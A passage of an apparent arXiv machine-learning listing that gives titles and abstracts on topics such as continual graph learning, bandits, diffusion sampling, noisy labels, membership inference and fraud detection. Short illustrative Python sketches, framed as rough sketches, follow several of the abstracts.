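robust_logits = np.array([2.0, 1.5, 0.3, 0.1])   # hypothetical robust-teacher logits
H_clean = entropy(softmax(clean_logits, T=2.0))
T_robust = match_entropy(robust_logits, H_clean) # robust teacher now matches in entropy
```

After this step both teachers present distributions of equal entropy, so neither dominates the student's distillation signal by sheer confidence.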
    Continual Learning on Dynamic Graphs via Parameter Isolation. (arXiv:2305.13825v2 [cs.LG] UPDATED)
    Many real-world graph learning tasks require handling dynamic graphs where new nodes and edges emerge. Dynamic graph learning methods commonly suffer from the catastrophic forgetting problem, where knowledge learned for previous graphs is overwritten by updates for new graphs. To alleviate the problem, continual graph learning methods are proposed. However, existing continual graph learning methods aim to learn new patterns and maintain old ones with the same set of parameters of fixed size, and thus face a fundamental tradeoff between both goals. In this paper, we propose Parameter Isolation GNN (PI-GNN) for continual learning on dynamic graphs that circumvents the tradeoff via parameter isolation and expansion. Our motivation is that different parameters contribute to learning different graph patterns. Based on this idea, we expand model parameters to continually learn emerging graph patterns. Meanwhile, to effectively preserve knowledge for unaffected patterns, we find parameters that correspond to them via optimization and freeze them to prevent them from being rewritten. Experiments on eight real-world datasets corroborate the effectiveness of PI-GNN compared to state-of-the-art baselines.
    Defining data science: a new field of inquiry. (arXiv:2306.16177v2 [cs.LG] UPDATED)
    Data science is not a science. It is a research paradigm. Its power, scope, and scale will surpass science, our most powerful research paradigm, to enable knowledge discovery and change our world. We have yet to understand and define it, which is vital to realizing its potential and managing its risks. Modern data science is in its infancy. Emerging slowly since 1962 and rapidly since 2000, it is a fundamentally new field of inquiry, one of the most active, powerful, and rapidly evolving 21st century innovations. Due to its value, power, and applicability, it is emerging in 40+ disciplines, hundreds of research areas, and thousands of applications. Millions of data science publications contain myriad definitions of data science and data science problem solving. Due to its infancy, many definitions are independent, application-specific, mutually incomplete, redundant, or inconsistent, hence so is data science. This research addresses the multiple-definitions challenge by proposing the development of a coherent, unified definition based on a data science reference framework, using a data science journal through which the data science community can achieve such a definition. This paper provides candidate definitions for the essential data science artifacts that are required to discuss such a definition. They are based on the classical research paradigm concept consisting of a philosophy of data science, the data science problem solving paradigm, and the six-component data science reference framework (axiology, ontology, epistemology, methodology, methods, technology), a frequently called-for unifying framework with which to define, unify, and evolve data science. It presents challenges for defining data science, solution approaches, i.e., means for defining data science, and their requirements and benefits as the basis of a comprehensive solution.
    Randomized Exploration in Generalized Linear Bandits. (arXiv:1906.08947v3 [cs.LG] UPDATED)
    We study two randomized algorithms for generalized linear bandits. The first, GLM-TSL, samples a generalized linear model (GLM) from the Laplace approximation to the posterior distribution. The second, GLM-FPL, fits a GLM to a randomly perturbed history of past rewards. We analyze both algorithms and derive $\tilde{O}(d \sqrt{n \log K})$ upper bounds on their $n$-round regret, where $d$ is the number of features and $K$ is the number of arms. The former improves on prior work while the latter is the first for Gaussian noise perturbations in non-linear models. We empirically evaluate both GLM-TSL and GLM-FPL in logistic bandits, and apply GLM-FPL to neural network bandits. Our work showcases the role of randomization, beyond posterior sampling, in exploration.
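    As a rough sketch of the first algorithm's idea: GLM-TSL-style exploration fits a MAP logistic model, forms the Laplace approximation N(w_MAP, H^-1) to the posterior, samples a parameter vector from it, and acts greedily under the sample. The helper names and hyperparameters below are illustrative, not the paper's.

```python
import numpy as np

rng = np.random.default_rng(0)

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def map_and_hessian(X, y, lam=1.0, iters=25):
    """MAP weights and Hessian for L2-regularised logistic regression,
    computed with Newton's method."""
    d = X.shape[1]
    w = np.zeros(d)
    for _ in range(iters):
        p = sigmoid(X @ w)
        g = X.T @ (p - y) + lam * w
        H = X.T @ (X * (p * (1 - p))[:, None]) + lam * np.eye(d)
        w -= np.linalg.solve(H, g)
    return w, H

def glm_tsl_round(arms, X_hist, y_hist, lam=1.0):
    """One GLM-TSL-style round: sample from the Laplace approximation
    N(w_MAP, H^-1) and play the arm with the largest sampled mean."""
    w_map, H = map_and_hessian(X_hist, y_hist, lam)
    w_tilde = rng.multivariate_normal(w_map, np.linalg.inv(H))
    return int(np.argmax(arms @ w_tilde))
```

    With enough history the posterior concentrates, and the sampled parameter almost always selects the better arm.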
    Automating Augmentation Through Random Unidimensional Search. (arXiv:2106.08756v3 [cs.LG] UPDATED)
    It is no secret amongst deep learning researchers that finding the optimal data augmentation strategy during training can mean the difference between state-of-the-art performance and a run-of-the-mill result. To that end, the community has seen many efforts to automate the process of finding the perfect augmentation procedure for any task at hand. Unfortunately, even recent cutting-edge methods bring massive computational overhead, requiring as many as 100 full model trainings to settle on an ideal configuration. We show how to achieve equivalent performance using just 6 trainings with Random Unidimensional Augmentation. Source code is available at https://github.com/fastestimator/RUA/tree/v1.0
    The Statistical Complexity of Interactive Decision Making. (arXiv:2112.13487v3 [cs.LG] UPDATED)
    A fundamental challenge in interactive learning and decision making, ranging from bandit problems to reinforcement learning, is to provide sample-efficient, adaptive learning algorithms that achieve near-optimal regret. This question is analogous to the classical problem of optimal (supervised) statistical learning, where there are well-known complexity measures (e.g., VC dimension and Rademacher complexity) that govern the statistical complexity of learning. However, characterizing the statistical complexity of interactive learning is substantially more challenging due to the adaptive nature of the problem. The main result of this work provides a complexity measure, the Decision-Estimation Coefficient, that is proven to be both necessary and sufficient for sample-efficient interactive learning. In particular, we provide: 1. a lower bound on the optimal regret for any interactive decision making problem, establishing the Decision-Estimation Coefficient as a fundamental limit. 2. a unified algorithm design principle, Estimation-to-Decisions (E2D), which transforms any algorithm for supervised estimation into an online algorithm for decision making. E2D attains a regret bound that matches our lower bound up to dependence on a notion of estimation performance, thereby achieving optimal sample-efficient learning as characterized by the Decision-Estimation Coefficient. Taken together, these results constitute a theory of learnability for interactive decision making. When applied to reinforcement learning settings, the Decision-Estimation Coefficient recovers essentially all existing hardness results and lower bounds. More broadly, the approach can be viewed as a decision-theoretic analogue of the classical Le Cam theory of statistical estimation; it also unifies a number of existing approaches -- both Bayesian and frequentist.
    The Implicit Bias of Batch Normalization in Linear Models and Two-layer Linear Convolutional Neural Networks. (arXiv:2306.11680v2 [cs.LG] UPDATED)
    We study the implicit bias of batch normalization trained by gradient descent. We show that when learning a linear model with batch normalization for binary classification, gradient descent converges to a uniform margin classifier on the training data with an $\exp(-\Omega(\log^2 t))$ convergence rate. This distinguishes linear models with batch normalization from those without batch normalization in terms of both the type of implicit bias and the convergence rate. We further extend our result to a class of two-layer, single-filter linear convolutional neural networks, and show that batch normalization has an implicit bias towards a patch-wise uniform margin. Based on two examples, we demonstrate that patch-wise uniform margin classifiers can outperform the maximum margin classifiers in certain learning problems. Our results contribute to a better theoretical understanding of batch normalization.
    Domain-Agnostic Neural Architecture for Class Incremental Continual Learning in Document Processing Platform. (arXiv:2307.05399v1 [cs.LG])
    Production deployments in complex systems require ML architectures to be highly efficient and usable against multiple tasks. Particularly demanding are classification problems in which data arrives in a streaming fashion and each class is presented separately. Recent methods with stochastic gradient learning have been shown to struggle in such setups or have limitations, such as requiring a memory buffer or being restricted to specific domains, which prevents their usage in real-world scenarios. For this reason, we present a fully differentiable architecture based on the Mixture of Experts model that enables the training of high-performance classifiers when examples from each class are presented separately. We conducted exhaustive experiments that prove its applicability in various domains and its ability to learn online in production environments. The proposed technique achieves SOTA results without a memory buffer and clearly outperforms the reference methods.
    Using BOLD-fMRI to Compute the Respiration Volume per Time (RTV) and Respiration Variation (RV) with Convolutional Neural Networks (CNN) in the Human Connectome Development Cohort. (arXiv:2307.05426v1 [eess.SP])
    In many fMRI studies, respiratory signals are unavailable or do not have acceptable quality. Consequently, the direct removal of low-frequency respiratory variations from BOLD signals is not possible. This study proposes a one-dimensional CNN model for reconstruction of two respiratory measures, RV and RVT. Results show that a CNN can capture informative features from resting BOLD signals and reconstruct realistic RV and RVT timeseries. It is expected that application of the proposed method will lower the cost of fMRI studies, reduce complexity, and decrease the burden on participants as they will not be required to wear a respiratory bellows.
    ISLTranslate: Dataset for Translating Indian Sign Language. (arXiv:2307.05440v1 [cs.CL])
    Sign languages are the primary means of communication for many hard-of-hearing people worldwide. Recently, to bridge the communication gap between the hard-of-hearing community and the rest of the population, several sign language translation datasets have been proposed to enable the development of statistical sign language translation systems. However, there is a dearth of sign language resources for the Indian sign language. This resource paper introduces ISLTranslate, a translation dataset for continuous Indian Sign Language (ISL) consisting of 31k ISL-English sentence/phrase pairs. To the best of our knowledge, it is the largest translation dataset for continuous Indian Sign Language. We provide a detailed analysis of the dataset. To validate the performance of existing end-to-end Sign language to spoken language translation systems, we benchmark the created dataset with a transformer-based model for ISL translation.
    Metropolis Sampling for Constrained Diffusion Models. (arXiv:2307.05439v1 [cs.LG])
    Denoising diffusion models have recently emerged as the predominant paradigm for generative modelling. Their extension to Riemannian manifolds has facilitated their application to an array of problems in the natural sciences. Yet, in many practical settings, such manifolds are defined by a set of constraints and are not covered by the existing (Riemannian) diffusion model methodology. Recent work has attempted to address this issue by employing novel noising processes based on logarithmic barrier methods or reflected Brownian motions. However, the associated samplers are computationally burdensome as the complexity of the constraints increases. In this paper, we introduce an alternative simple noising scheme based on Metropolis sampling that affords substantial gains in computational efficiency and empirical performance compared to the earlier samplers. Of independent interest, we prove that this new process corresponds to a valid discretisation of the reflected Brownian motion. We demonstrate the scalability and flexibility of our approach on a range of problem settings with convex and non-convex constraints, including applications from geospatial modelling, robotics and protein design.
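    The rejection idea behind such Metropolis-style noising can be sketched in a few lines: propose a Gaussian random-walk move and stay put whenever the proposal violates the constraints. This is a minimal caricature of the scheme (the paper establishes a more careful correspondence with reflected Brownian motion); the function names are assumptions.

```python
import numpy as np

rng = np.random.default_rng(1)

def metropolis_noise_step(x, step, in_domain):
    """One noising step: propose a Gaussian random-walk move and
    reject it (stay put) if the proposal leaves the constraint set."""
    prop = x + step * rng.standard_normal(x.shape)
    return prop if in_domain(prop) else x

def noise_trajectory(x0, step, in_domain, n_steps):
    """Run the constrained noising process for n_steps."""
    xs = [np.asarray(x0, float)]
    for _ in range(n_steps):
        xs.append(metropolis_noise_step(xs[-1], step, in_domain))
    return np.stack(xs)
```

    The cost per step is a single constraint check, which is why this style of sampler scales better with constraint complexity than barrier or reflection computations.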
    A Self-Supervised Algorithm for Denoising Photoplethysmography Signals for Heart Rate Estimation from Wearables. (arXiv:2307.05339v1 [eess.SP])
    Smart watches and other wearable devices are equipped with photoplethysmography (PPG) sensors for monitoring heart rate and other aspects of cardiovascular health. However, PPG signals collected from such devices are susceptible to corruption from noise and motion artifacts, which cause errors in heart rate estimation. Typical denoising approaches filter or reconstruct the signal in ways that eliminate much of the morphological information, even from the clean parts of the signal that would be useful to preserve. In this work, we develop an algorithm for denoising PPG signals that reconstructs the corrupted parts of the signal, while preserving the clean parts of the PPG signal. Our novel framework relies on self-supervised training, where we leverage a large database of clean PPG signals to train a denoising autoencoder. As we show, our reconstructed signals provide better estimates of heart rate from PPG signals than the leading heart rate estimation methods. Further experiments show significant improvement in Heart Rate Variability (HRV) estimation from PPG signals using our algorithm. We conclude that our algorithm denoises PPG signals in a way that can improve downstream analysis of many different health metrics from wearable devices.
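    The self-supervised setup can be sketched as pair generation from clean signals: corrupt a random segment, keep the rest intact, and train a denoising autoencoder to map the corrupted window back to the clean one. The additive Gaussian burst below is a stand-in for real motion artifacts, not the paper's corruption model.

```python
import numpy as np

rng = np.random.default_rng(2)

def corrupt_ppg(clean, artifact_frac=0.3, noise_std=0.5):
    """Build a (corrupted, clean, mask) training pair from a clean PPG
    window: a random contiguous segment is hit with noise, the rest is
    left intact. An autoencoder trained on such pairs learns to
    reconstruct the corrupted span while preserving clean samples."""
    n = len(clean)
    seg = int(artifact_frac * n)
    start = rng.integers(0, n - seg)
    mask = np.zeros(n, bool)
    mask[start:start + seg] = True
    corrupted = clean.copy()
    corrupted[mask] += noise_std * rng.standard_normal(seg)
    return corrupted, clean, mask
```

    Because only a segment is corrupted, the reconstruction target explicitly rewards preserving the clean morphology, matching the paper's motivation.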
    Action-based Early Autism Diagnosis Using Contrastive Feature Learning. (arXiv:2209.05379v3 [cs.CV] UPDATED)
    Autism, also known as Autism Spectrum Disorder (or ASD), is a neurological disorder. Its main symptoms include difficulty in (verbal and/or non-verbal) communication, and rigid/repetitive behavior. These symptoms are often indistinguishable from those of a normal (control) individual, due to which this disorder remains undiagnosed in early childhood, leading to delayed treatment. Since the learning curve is steep during the initial age, an early diagnosis of autism would allow adequate interventions to be taken at the right time, which might positively affect the growth of an autistic child. Further, the traditional methods of autism diagnosis require multiple visits to a specialized psychiatrist; however, this process can be time-consuming. In this paper, we present a learning-based approach to automate autism diagnosis using simple and small action video clips of subjects. This task is particularly challenging because the amount of annotated data available is small, and the variations among samples from the two categories (ASD and control) are generally indistinguishable. This is also evident from the poor performance of a binary classifier learned using the cross-entropy loss on top of a baseline encoder. To address this, we adopt contrastive feature learning in both self-supervised and supervised learning frameworks, and show that these can lead to a significant increase in the prediction accuracy of a binary classifier on this task. We further validate this by conducting thorough experimental analyses under different set-ups on two publicly available datasets.
    Improving the Security of Smartwatch Payment with Deep Learning. (arXiv:2307.05437v1 [cs.CR])
    Making contactless payments using a smartwatch is increasingly popular, but this payment medium lacks traditional biometric security measures such as facial or fingerprint recognition. In 2022, Sturgess et al. proposed WatchAuth, a system for authenticating smartwatch payments using the physical gesture of reaching towards a payment terminal. While effective, the system requires the user to undergo a burdensome enrolment period to achieve acceptable error levels. In this dissertation, we explore whether applications of deep learning can reduce the number of gestures a user must provide to enrol into an authentication system for smartwatch payment. We firstly construct a deep-learned authentication system that outperforms the current state-of-the-art, including in a scenario where the target user has provided a limited number of gestures. We then develop a regularised autoencoder model for generating synthetic user-specific gestures. We show that using these gestures in training improves classification ability for an authentication system. Through this technique we can reduce the number of gestures required to enrol a user into a WatchAuth-like system without negatively impacting its error rates.
    A Physics-Informed Low-Shot Learning For sEMG-Based Estimation of Muscle Force and Joint Kinematics. (arXiv:2307.05361v1 [eess.SP])
    Muscle force and joint kinematics estimation from surface electromyography (sEMG) are essential for real-time biomechanical analysis of the dynamic interplay among neural muscle stimulation, muscle dynamics, and kinetics. Recent advances in deep neural networks (DNNs) have shown the potential to improve biomechanical analysis in a fully automated and reproducible manner. However, the small-sample nature and physical interpretability requirements of biomechanical analysis limit the applications of DNNs. This paper presents a novel physics-informed low-shot learning method for sEMG-based estimation of muscle force and joint kinematics. This method seamlessly integrates Lagrange's equation of motion and an inverse dynamic muscle model into the generative adversarial network (GAN) framework for structured feature decoding and extrapolated estimation from small-sample data. Specifically, Lagrange's equation of motion is introduced into the generative model to constrain the structured decoding of the high-level features according to the laws of physics. A physics-informed policy gradient is then designed to improve adversarial learning efficiency by rewarding consistency between the physical representations of the extrapolated estimations and the physical references. Experimental validations are conducted on two scenarios (i.e., walking trials and wrist motion trials). Results indicate that the estimations of the muscle forces and joint kinematics are unbiased compared to the physics-based inverse dynamics, and outperform the selected benchmark methods, including the physics-informed convolutional neural network (PI-CNN), vanilla generative adversarial network (GAN), and multi-layer extreme learning machine (ML-ELM).
    U-CREAT: Unsupervised Case Retrieval using Events extrAcTion. (arXiv:2307.05260v1 [cs.IR])
    The task of Prior Case Retrieval (PCR) in the legal domain is about automatically citing relevant (based on facts and precedence) prior legal cases in a given query case. To further promote research in PCR, in this paper, we propose a new large benchmark (in English) for the PCR task: the IL-PCR (Indian Legal Prior Case Retrieval) corpus. Given the complex nature of case relevance and the long size of legal documents, BM25 remains a strong baseline for ranking the cited prior documents. In this work, we explore the role of events in legal case retrieval and propose an unsupervised retrieval pipeline, U-CREAT (Unsupervised Case Retrieval using Events Extraction). We find that the proposed unsupervised retrieval method significantly increases performance compared to BM25 and makes retrieval faster by a considerable margin, making it applicable to real-time case retrieval systems. Our proposed system is generic; we show that it generalizes across two different legal systems (Indian and Canadian), and it shows state-of-the-art performance on the benchmarks for both legal systems (the IL-PCR and COLIEE corpora).
    Boosting Feedback Efficiency of Interactive Reinforcement Learning by Adaptive Learning from Scores. (arXiv:2307.05405v1 [cs.RO])
    Interactive reinforcement learning has shown promise in learning complex robotic tasks. However, the process can be human-intensive due to the requirement of a large amount of interactive feedback. This paper presents a new method that uses scores provided by humans, instead of pairwise preferences, to improve the feedback efficiency of interactive reinforcement learning. Our key insight is that scores can yield significantly more data than pairwise preferences. Specifically, we require a teacher to interactively score the full trajectories of an agent to train a behavioral policy in a sparse reward environment. To prevent unstable scores given by humans from negatively impacting the training process, we propose an adaptive learning scheme. This enables the learning paradigm to be insensitive to imperfect or unreliable scores. We extensively evaluate our method on robotic locomotion and manipulation tasks. The results show that the proposed method can efficiently learn near-optimal policies by adaptive learning from scores, while requiring less feedback compared to pairwise preference learning methods. The source codes are publicly available at https://github.com/SSKKai/Interactive-Scoring-IRL.
    A Survey From Distributed Machine Learning to Distributed Deep Learning. (arXiv:2307.05232v1 [cs.LG])
    Artificial intelligence has achieved significant success in handling complex tasks in recent years. This success is due to advances in machine learning algorithms and hardware acceleration. In order to obtain more accurate results and solve more complex problems, algorithms must be trained with more data. This huge amount of data can be time-consuming to process and require a great deal of computation. One solution is to distribute the data and algorithm across several machines, which is known as distributed machine learning. There has been considerable effort put into distributed machine learning algorithms, and different methods have been proposed so far. In this article, we present a comprehensive summary of the current state-of-the-art in the field through a review of these algorithms. We divide these algorithms into classification and clustering (traditional machine learning), deep learning, and deep reinforcement learning groups. Distributed deep learning has gained more attention in recent years, and most studies focus on these algorithms. As a result, most of the articles we discuss here belong to this category. Based on our investigation of the algorithms, we highlight limitations that should be addressed in future research.
    Unleashing the Potential of Regularization Strategies in Learning with Noisy Labels. (arXiv:2307.05025v1 [cs.LG])
    In recent years, research on learning with noisy labels has focused on devising novel algorithms that can achieve robustness to noisy training labels while generalizing to clean data. These algorithms often incorporate sophisticated techniques, such as noise modeling, label correction, and co-training. In this study, we demonstrate that a simple baseline using cross-entropy loss, combined with widely used regularization strategies like learning rate decay, model weight averaging, and data augmentation, can outperform state-of-the-art methods. Our findings suggest that employing a combination of regularization strategies can be more effective than intricate algorithms in tackling the challenges of learning with noisy labels. While some of these regularization strategies have been utilized in previous noisy label learning research, their full potential has not been thoroughly explored. Our results encourage a reevaluation of benchmarks for learning with noisy labels and prompt reconsideration of the role of specialized learning algorithms designed for training with noisy labels.
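    A minimal sketch of such a regularized baseline, assuming a linear model: plain cross-entropy gradient descent with cosine learning-rate decay and an exponential moving average (EMA) of the weights, with the EMA weights returned for evaluation instead of the raw ones. All hyperparameters are illustrative.

```python
import numpy as np

rng = np.random.default_rng(3)

def train_regularized_baseline(X, y, epochs=200, lr0=0.5, ema_decay=0.98):
    """Cross-entropy training of a linear classifier with two of the
    regularizers named above: cosine LR decay and weight averaging."""
    d = X.shape[1]
    w = np.zeros(d)
    w_ema = np.zeros(d)
    for t in range(epochs):
        lr = lr0 * 0.5 * (1 + np.cos(np.pi * t / epochs))   # cosine decay
        p = 1.0 / (1.0 + np.exp(-(X @ w)))                  # sigmoid
        w -= lr * X.T @ (p - y) / len(y)                    # CE gradient step
        w_ema = ema_decay * w_ema + (1 - ema_decay) * w     # weight averaging
    return w_ema
```

    Even with a sizeable fraction of flipped labels, the averaged weights recover a decision boundary close to the clean one.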
    Attribute Controlled Dialogue Prompting. (arXiv:2307.05228v1 [cs.CL])
    Prompt-tuning has become an increasingly popular parameter-efficient method for adapting large pretrained language models to downstream tasks. However, both discrete prompting and continuous prompting assume fixed prompts for all data samples within a task, neglecting the fact that inputs vary greatly in some tasks such as open-domain dialogue generation. In this paper, we present a novel, instance-specific prompt-tuning algorithm for dialogue generation. Specifically, we generate prompts based on instance-level control code, rather than the conversation history, to explore their impact on controlled dialogue generation. Experiments on popular open-domain dialogue datasets, evaluated on both automated metrics and human evaluation, demonstrate that our method is superior to prompting baselines and comparable to fine-tuning with only 5%-6% of total parameters.
    Self-Supervised Learning with Lie Symmetries for Partial Differential Equations. (arXiv:2307.05432v1 [cs.LG])
    Machine learning for differential equations paves the way for computationally efficient alternatives to numerical solvers, with potentially broad impacts in science and engineering. Though current algorithms typically require simulated training data tailored to a given setting, one may instead wish to learn useful information from heterogeneous sources, or from real dynamical systems observations that are messy or incomplete. In this work, we learn general-purpose representations of PDEs from heterogeneous data by implementing joint embedding methods for self-supervised learning (SSL), a framework for unsupervised representation learning that has had notable success in computer vision. Our representation outperforms baseline approaches to invariant tasks, such as regressing the coefficients of a PDE, while also improving the time-stepping performance of neural solvers. We hope that our proposed methodology will prove useful in the eventual development of general-purpose foundation models for PDEs.
    The Value of Chess Squares. (arXiv:2307.05330v1 [cs.AI])
    Valuing chess squares and determining the placement of pieces on the board are the main objectives of our study. With the emergence of chess AI, it has become possible to accurately assess the worth of positions in a game of chess. The conventional approach assigns fixed values to pieces $(\symking=\infty, \symqueen=9, \symrook=5, \symbishop=3, \symknight=3, \sympawn=1)$. We enhance this analysis by introducing marginal valuations for both pieces and squares. We demonstrate our method by examining the positioning of Knights and Bishops, and also provide valuable insights into the valuation of pawns. Notably, Nimzowitsch was among the pioneers in advocating for the significance of Pawn structure and valuation. Finally, we conclude by suggesting potential avenues for future research.
    Membership Inference Attacks on DNNs using Adversarial Perturbations. (arXiv:2307.05193v1 [cs.LG])
    Several membership inference (MI) attacks have been proposed to audit a target DNN. Given a set of subjects, MI attacks tell which subjects the target DNN has seen during training. This work focuses on the post-training MI attacks emphasizing high confidence membership detection -- True Positive Rates (TPR) at low False Positive Rates (FPR). Current works in this category -- likelihood ratio attack (LiRA) and enhanced MI attack (EMIA) -- only perform well on complex datasets (e.g., CIFAR-10 and Imagenet) where the target DNN overfits its train set, but perform poorly on simpler datasets (0% TPR by both attacks on Fashion-MNIST, 2% and 0% TPR respectively by LiRA and EMIA on MNIST at 1% FPR). To address this, firstly, we unify current MI attacks by presenting a framework divided into three stages -- preparation, indication and decision. Secondly, we utilize the framework to propose two novel attacks: (1) Adversarial Membership Inference Attack (AMIA) efficiently utilizes the membership and the non-membership information of the subjects while adversarially minimizing a novel loss function, achieving 6% TPR on both Fashion-MNIST and MNIST datasets; and (2) Enhanced AMIA (E-AMIA) combines EMIA and AMIA to achieve 8% and 4% TPRs on Fashion-MNIST and MNIST datasets respectively, at 1% FPR. Thirdly, we introduce two novel augmented indicators that positively leverage the loss information in the Gaussian neighborhood of a subject. This improves the TPR of all four attacks on average by 2.5% and 0.25% respectively on Fashion-MNIST and MNIST datasets at 1% FPR. Finally, we propose a simple, yet novel, evaluation metric, the running TPR average (RTA) at a given FPR, that better distinguishes different MI attacks in the low FPR region. We also show that AMIA and E-AMIA are more transferable to unknown DNNs (other than the target DNN) and are more robust to DP-SGD training as compared to LiRA and EMIA.
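    The TPR-at-low-FPR evaluation, and a running-average variant in the spirit of the proposed RTA metric, can be sketched as follows. The exact definition of RTA in the paper may differ; this is an illustrative reading.

```python
import numpy as np

def tpr_at_fpr(scores, is_member, target_fpr=0.01):
    """TPR at a fixed FPR: the threshold is chosen from the non-member
    scores so that at most target_fpr of them are flagged as members."""
    non_members = np.sort(scores[~is_member])[::-1]
    k = max(int(np.floor(target_fpr * len(non_members))), 1)
    thresh = non_members[k - 1]
    return float((scores[is_member] > thresh).mean())

def running_tpr_average(scores, is_member, target_fpr=0.01, grid=None):
    """RTA-style sketch: mean TPR over a grid of FPRs up to target_fpr,
    summarising attack behaviour across the whole low-FPR region."""
    grid = grid if grid is not None else np.linspace(1e-3, target_fpr, 10)
    return float(np.mean([tpr_at_fpr(scores, is_member, f) for f in grid]))
```

    Averaging over a grid of low FPRs rewards attacks that are strong throughout the low-FPR region rather than at a single operating point.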
    Unbiased Pain Assessment through Wearables and EHR Data: Multi-attribute Fairness Loss-based CNN Approach. (arXiv:2307.05333v1 [eess.SP])
    The combination of diverse health data (IoT, EHR, and clinical surveys) and scalable, adaptable Artificial Intelligence (AI) has enabled the discovery of physical, behavioral, and psycho-social indicators of pain status. Despite the hype and promise to fundamentally alter the healthcare system with technological advancements, much AI adoption in clinical pain evaluation has been hampered by the heterogeneity of the problem itself and other challenges, such as personalization and fairness. Studies have revealed that many AI (i.e., machine learning or deep learning) models display biases and discriminate against specific population segments (such as those based on gender or ethnicity), which breeds skepticism among medical professionals about AI adaptability. In this paper, we propose a Multi-attribute Fairness Loss (MAFL) based CNN model that aims to account for any sensitive attributes included in the data and fairly predict patients' pain status while attempting to minimize the discrepancies between privileged and unprivileged groups. In order to determine whether the trade-off between accuracy and fairness can be satisfied, we compare the proposed model with well-known existing mitigation procedures, and studies reveal that the implemented model performs favorably in contrast to state-of-the-art methods. We utilize NIH All-Of-US data, considering a cohort of 868 distinct individuals with wearables and EHR data gathered over 1500 days, to analyze our suggested fair pain assessment system.
    A Deep Dive into Perturbations as Evaluation Technique for Time Series XAI. (arXiv:2307.05104v1 [cs.LG])
    Explainable Artificial Intelligence (XAI) has gained significant attention recently as the demand for transparency and interpretability of machine learning models has increased. In particular, XAI for time series data has become increasingly important in finance, healthcare, and climate science. However, evaluating the quality of explanations, such as attributions provided by XAI techniques, remains challenging. This paper provides an in-depth analysis of using perturbations to evaluate attributions extracted from time series models. A perturbation analysis involves systematically modifying the input data and evaluating the impact on the attributions generated by the XAI method. We apply this approach to several state-of-the-art XAI techniques and evaluate their performance on three time series classification datasets. Our results demonstrate that the perturbation analysis approach can effectively evaluate the quality of attributions and provide insights into the strengths and limitations of XAI techniques. Such an approach can guide the selection of XAI methods for time series data, e.g., focusing on return time rather than precision, and facilitate the development of more reliable and interpretable machine learning models for time series analysis.
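    The perturbation analysis itself is easy to sketch: replace the k most-attributed timesteps with a baseline value and measure the change in model output; a faithful attribution method should change the output more than perturbing irrelevant timesteps. Function names are illustrative.

```python
import numpy as np

def perturbation_score(model, x, attributions, k, baseline=0.0):
    """Perturb the k timesteps with the highest attribution and return
    the absolute change in the model's output. Larger changes suggest
    the attribution identified genuinely influential timesteps."""
    top = np.argsort(attributions)[::-1][:k]
    x_pert = x.copy()
    x_pert[top] = baseline
    return abs(model(x) - model(x_pert))
```

    Comparing this score for an XAI method's attributions against a random or adversarial attribution gives a simple faithfulness check.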
    Application of data engineering approaches to address challenges in microbiome data for optimal medical decision-making. (arXiv:2307.00033v2 [q-bio.QM] UPDATED)
    The human gut microbiota is known to contribute to numerous physiological functions of the body and is also implicated in a myriad of pathological conditions. Prolific research work in the past few decades has yielded valuable information regarding the relative taxonomic distribution of gut microbiota. Unfortunately, microbiome data suffers from class imbalance and high dimensionality issues that must be addressed. In this study, we have implemented data engineering algorithms to address the above-mentioned issues inherent to microbiome data. Four standard machine learning classifiers (logistic regression (LR), support vector machines (SVM), random forests (RF), and extreme gradient boosting (XGB) decision trees) were implemented on a previously published dataset. The issues of class imbalance and high dimensionality were addressed through the synthetic minority oversampling technique (SMOTE) and principal component analysis (PCA). Our results indicate that ensemble classifiers (RF and XGB decision trees) exhibit superior classification accuracy in predicting the host phenotype. The application of PCA significantly reduced testing time while maintaining high classification accuracy. The highest classification accuracy was obtained at the species level for most classifiers. The prototype employed in the study addresses the issues inherent to microbiome datasets and could be highly beneficial for providing personalized medicine.
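    The two data-engineering steps can be sketched without library dependencies: a minimal SMOTE that interpolates between minority samples and their nearest minority neighbours, and PCA via SVD of the centred data matrix. Real implementations (e.g., imbalanced-learn's SMOTE) are more careful; this is only an illustration.

```python
import numpy as np

rng = np.random.default_rng(4)

def smote(X_min, n_new, k=3):
    """Minimal SMOTE: each synthetic point is a random interpolation
    between a minority sample and one of its k nearest minority
    neighbours, so new points stay inside the minority region."""
    out = []
    for _ in range(n_new):
        i = rng.integers(len(X_min))
        d = np.linalg.norm(X_min - X_min[i], axis=1)
        nbrs = np.argsort(d)[1:k + 1]            # skip the point itself
        j = rng.choice(nbrs)
        out.append(X_min[i] + rng.random() * (X_min[j] - X_min[i]))
    return np.array(out)

def pca_fit_transform(X, n_components):
    """PCA via SVD of the centred data matrix: project onto the top
    right-singular vectors."""
    Xc = X - X.mean(axis=0)
    _, _, Vt = np.linalg.svd(Xc, full_matrices=False)
    return Xc @ Vt[:n_components].T
```

    Oversampling the minority class before classification and projecting to a few components is what cuts testing time while keeping accuracy, as the abstract reports.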
    Transaction Fraud Detection via Spatial-Temporal-Aware Graph Transformer. (arXiv:2307.05121v1 [cs.LG])
    How to obtain informative representations of transactions and then perform the identification of fraudulent transactions is a crucial part of ensuring financial security. Recent studies apply Graph Neural Networks (GNNs) to the transaction fraud detection problem. Nevertheless, they encounter challenges in effectively learning spatial-temporal information due to structural limitations. Moreover, few prior GNN-based detectors have recognized the significance of incorporating global information, which encompasses similar behavioral patterns and offers valuable insights for discriminative representation learning. Therefore, we propose a novel heterogeneous graph neural network called Spatial-Temporal-Aware Graph Transformer (STA-GT) for transaction fraud detection problems. Specifically, we design a temporal encoding strategy to capture temporal dependencies and incorporate it into the graph neural network framework, enhancing spatial-temporal information modeling and improving expressive ability. Furthermore, we introduce a transformer module to learn local and global information. Pairwise node-node interactions overcome the structural limitation of GNNs and build up interactions between the target node and long-distance ones. Experimental results on two financial datasets demonstrate that our proposed STA-GT outperforms general GNN models and GNN-based fraud detectors on the transaction fraud detection task.
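    The paper's exact temporal encoding is not specified in the abstract; a common choice it plausibly resembles is the transformer-style sinusoidal encoding, sketched below for irregular transaction timestamps. The timestamps, feature sizes, and the concatenation step are illustrative assumptions.

```python
import numpy as np

def temporal_encoding(t, dim):
    """Transformer-style sinusoidal encoding of (possibly irregular)
    timestamps t, giving each transaction a dim-dimensional time feature."""
    t = np.asarray(t, dtype=float)[:, None]                   # (N, 1)
    freqs = 1.0 / (10000.0 ** (np.arange(0, dim, 2) / dim))   # (dim/2,)
    angles = t * freqs                                        # (N, dim/2)
    enc = np.empty((len(t), dim))
    enc[:, 0::2] = np.sin(angles)
    enc[:, 1::2] = np.cos(angles)
    return enc

# Append the time features to per-transaction node features
ts = [0.0, 3.5, 3.6, 120.0]          # seconds since the first transaction
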